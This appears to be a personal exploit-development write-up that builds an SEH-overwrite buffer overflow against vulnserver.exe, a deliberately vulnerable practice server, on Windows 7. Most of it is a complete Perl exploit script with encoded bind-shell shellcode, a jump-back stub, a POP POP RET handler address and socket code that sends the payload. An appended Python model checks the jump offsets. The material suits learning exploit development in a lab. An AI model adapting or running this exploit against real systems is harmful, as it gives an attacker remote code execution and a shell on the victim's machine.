Today I tried exploiting vulnserver.exe with an SEH overwrite using a backward two-byte jump followed by a backward long jump, on the Windows 7 operating system.
Keep in mind that the first byte of a SHORT jump is EB and the second byte is a relative offset, measured from the instruction after the jump:
00h to 7Fh for forward jumps
80h to FFh for backward jumps
The well-known, nicely formatted InfoSec Institute write-up covers the forward-jump case; the original is at the link below.
http://resources.infosecinstitute.com/seh-exploit/
Basically my flow is Junk + ShellCode + NOPs + JMPBACK + NOPs + SHORTJMP + PPR + Junk, where the PPR (POP POP RET) address is what overwrites the SEH handler.
The two jump pieces are:
$baddata .= "\x90\x90\xeb\xd9"; # SHORTJMP
$baddata .= "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"; # JMPBACK
JMPBACK moves EIP into ECX, decreases ECX and then jumps to ECX (taken from Phrack #62).
The shellcode is a standard bind_tcp shell encoded with x86/shikata_ga_nai; the bad characters are "\x00\x0a\x0d".
#!/usr/bin/perl
use IO::Socket;

# Both the target IP address and the TCP port are required
if (@ARGV < 2) {
    die("Usage: $0 IP_ADDRESS PORT\n\n");
}

my $baddata = "GMON /";    # vulnserver GMON command
$baddata .= "A" x 2983;    # junk up to the shellcode
$baddata .= "\xba\xda\xaa\x03\xdb\xda\xc5\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x56\x31\x53\x13\x83\xeb\xfc\x03\x53\xd5\x48\xf6\x27" .
"\x01\x05\xf9\xd7\xd1\x76\x73\x32\xe0\xa4\xe7\x36\x50\x79" .
"\x63\x1a\x58\xf2\x21\x8f\xeb\x76\xee\xa0\x5c\x3c\xc8\x8f" .
"\x5d\xf0\xd4\x5c\x9d\x92\xa8\x9e\xf1\x74\x90\x50\x04\x74" .
"\xd5\x8d\xe6\x24\x8e\xda\x54\xd9\xbb\x9f\x64\xd8\x6b\x94" .
"\xd4\xa2\x0e\x6b\xa0\x18\x10\xbc\x18\x16\x5a\x24\x13\x70" .
"\x7b\x55\xf0\x62\x47\x1c\x7d\x50\x33\x9f\x57\xa8\xbc\x91" .
"\x97\x67\x83\x1d\x1a\x79\xc3\x9a\xc4\x0c\x3f\xd9\x79\x17" .
"\x84\xa3\xa5\x92\x19\x03\x2e\x04\xfa\xb5\xe3\xd3\x89\xba" .
"\x48\x97\xd6\xde\x4f\x74\x6d\xda\xc4\x7b\xa2\x6a\x9e\x5f" .
"\x66\x36\x45\xc1\x3f\x92\x28\xfe\x20\x7a\x95\x5a\x2a\x69" .
"\xc2\xdd\x71\xe6\x27\xd0\x89\xf6\x2f\x63\xf9\xc4\xf0\xdf" .
"\x95\x64\x79\xc6\x62\x8a\x50\xbe\xfd\x75\x5a\xbf\xd4\xb1" .
"\x0e\xef\x4e\x13\x2e\x64\x8f\x9c\xfb\x2b\xdf\x32\x53\x8c" .
"\x8f\xf2\x03\x64\xda\xfc\x7c\x94\xe5\xd6\x0b\x92\x2b\x02" .
"\x58\x75\x4e\xb4\x4f\xd9\xc7\x52\x05\xf1\x81\xcd\xb1\x33" .
"\xf6\xc5\x26\x4b\xdc\x79\xff\xdb\x68\x94\xc7\xe4\x68\xb2" .
"\x64\x48\xc0\x55\xfe\x82\xd5\x44\x01\x8f\x7d\x0e\x3a\x58" .
"\xf7\x7e\x89\xf8\x08\xab\x79\x98\x9b\x30\x79\xd7\x87\xee" .
"\x2e\xb0\x76\xe7\xba\x2c\x20\x51\xd8\xac\xb4\x9a\x58\x6b" .
"\x05\x24\x61\xfe\x31\x02\x71\xc6\xba\x0e\x25\x96\xec\xd8" .
"\x93\x50\x47\xab\x4d\x0b\x34\x65\x19\xca\x76\xb6\x5f\xd3" .
"\x52\x40\xbf\x62\x0b\x15\xc0\x4b\xdb\x91\xb9\xb1\x7b\x5d" .
"\x10\x72\x8b\x14\x38\xd3\x04\xf1\xa9\x61\x49\x02\x04\xa5" .
"\x74\x81\xac\x56\x83\x99\xc5\x53\xcf\x1d\x36\x2e\x40\xc8" .
"\x38\x9d\x61\xd9";
$baddata .= "\x90" x 133;  # NOP sled between the shellcode and the JMPBACK stub
$baddata .= "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"; # JMPBACK: EIP -> ECX, decrease ECX, jmp ECX
$baddata .= "\x90" x 17;   # NOPs
$baddata .= "\x90\x90\xeb\xd9";       # next SEH: two NOPs + SHORTJMP (backward)
$baddata .= pack('V', 0x625011bf);    # SEH handler: POP POP RET address
$baddata .= "\x90" x (4000-length($baddata)); # pad the request to 4000 bytes

my $socket = IO::Socket::INET->new( # set up the TCP socket $socket
    Proto    => "tcp",
    PeerAddr => $ARGV[0], # command line argument 1: IP address
    PeerPort => $ARGV[1], # command line argument 2: TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";

my $sd;
$socket->recv($sd, 1024); # receive up to 1024 bytes (the banner) from $socket into $sd
print $sd;                # print the banner
$socket->send($baddata);  # send $baddata via $socket
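To make the jump arithmetic concrete, here is an added Python model of the $baddata layout above (example code, not part of the original post); it decodes the EB xx short-jump encoding and checks where both backward jumps land. The 368-byte shellcode length is counted from the script, and the stub model assumes the byte-wise CL/CH arithmetic does not wrap.

```python
# Added example, not part of the original post: a model of the $baddata layout
# used to check where the two backward jumps land. Offsets are from the start of $baddata.

def rel8_target(jmp_offset, disp):
    """Target of a two-byte short jump (EB disp) whose EB byte sits at jmp_offset.
    disp is the raw second byte: 00h-7Fh jumps forward, 80h-FFh backward
    (two's complement), both measured from the instruction after the jump."""
    if not 0 <= disp <= 0xFF:
        raise ValueError("displacement must be one byte")
    signed = disp - 0x100 if disp >= 0x80 else disp
    return jmp_offset + 2 + signed

def encode_short_jump(jmp_offset, target):
    """Inverse of rel8_target: the EB xx bytes for a jump at jmp_offset to target."""
    signed = target - (jmp_offset + 2)
    if not -128 <= signed <= 127:
        raise ValueError("target is out of short-jump range")
    return bytes([0xEB, signed & 0xFF])

SHELLCODE_LEN = 368   # byte count of the encoded bind_tcp blob in the script (counted)
JMPBACK = bytes.fromhex("D9EED97424F45980C10A90FECDFECDFFE1")  # the 17-byte stub

def layout(shellcode_len=SHELLCODE_LEN):
    """Byte offset of each piece of $baddata, mirroring the Perl concatenations."""
    off = {}
    off["shellcode"] = len("GMON /") + 2983          # after the "A" junk
    off["nops"] = off["shellcode"] + shellcode_len   # 133-byte NOP sled
    off["jmpback"] = off["nops"] + 133
    off["nseh"] = off["jmpback"] + len(JMPBACK) + 17 # "\x90\x90\xeb\xd9"
    off["shortjmp"] = off["nseh"] + 2                # the EB byte itself
    off["seh"] = off["nseh"] + 4                     # pack('V', 0x625011bf)
    return off

def jmpback_target(stub_offset):
    """Where the stub ends up: fnstenv/pop ecx yields the offset of its first
    byte, add cl,0x0A moves 10 forward, two 'dec ch' subtract 0x200, jmp ecx.
    Assumption: the byte-wise CL/CH arithmetic does not wrap."""
    return stub_offset + 0x0A - 2 * 0x100

def check(shellcode_len=SHELLCODE_LEN):
    """Distance of each landing point from the piece it is meant to reach."""
    off = layout(shellcode_len)
    short_land = rel8_target(off["shortjmp"], 0xD9)
    long_land = jmpback_target(off["jmpback"])
    return {
        "short_in_sled": off["nops"] <= short_land < off["jmpback"],
        "short_vs_jmpback": short_land - off["jmpback"],    # -1: last NOP of the sled
        "long_vs_shellcode": long_land - off["shellcode"],  # -1: last junk byte
    }
```

Both results come out at -1, so the short jump lands on the last NOP before the stub and the stub lands one byte before the shellcode, which is why the sizes 133 and 17 in the script work.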